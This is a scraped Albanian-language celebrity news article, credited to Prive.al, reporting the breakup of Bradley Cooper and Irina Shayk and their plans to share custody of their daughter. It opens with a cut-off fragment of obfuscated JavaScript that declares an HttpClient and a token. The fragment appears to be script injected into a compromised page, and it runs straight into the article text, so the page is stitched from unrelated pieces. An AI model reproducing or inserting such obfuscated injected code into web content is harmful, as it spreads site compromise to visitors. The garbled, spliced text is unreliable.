;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ja si kaluan ditët e fundit të lidhjes Bradley Cooper dhe Irina Shayk

By

Bradley Cooper dhe Irina Shayk i kanë dhënë zyrtarisht fund lidhjes katër vjeçare. Cifti i famshëm por shumë privat, janë prindër të një vajze. Ata së fundmi ishin bashkë në akademinë e ndarjes së çmimeve “Oscar”, por që atëherë nuk janë parë më bashkë.

Si duket pasi pasioni u shua, ata nuk kishin shumë gjëra të përbashkëta. “Ata nuk blenë kurrë një shtëpi bashkë në Kaliforni. Ishte vetëm shtëpia e tij. Ata nuk po bënin asnjë hap në drejtim të saj.” shtoi një burim pranë çiftit. “Po ashtu edhe fakti që ata kurrë nuk u martuan pasi u bënë me fëmijë. Duket se ata nuk po mundoheshin të qëndronin bashkë.”

E! News raportoi se çifti para ndarjes morën kohë nga njëri tjetri që të “testonin ujërat”.

“Ata kaluan kohë larg njëri tjetrit që të testonin ujërat,” shtoi burimi. “Ata kanë investuar shumë në njëri tjetrin dhe është e vështirë që thjesht të ndahen. Ata po mundohen të gjejnë rrugë tjera. Ata e duan vajzën e tyre shumë dhe kjo nuk do të ndryshojë për asnjë arsye.”

Çifti kanë ende raport të mirë dhe shpresojnë ta kenë gjithmonë për hir të vajzës për të cilën do të ndajnë kujdestarinë. /Prive.al

 

 

 

Artikuj të ngjashëm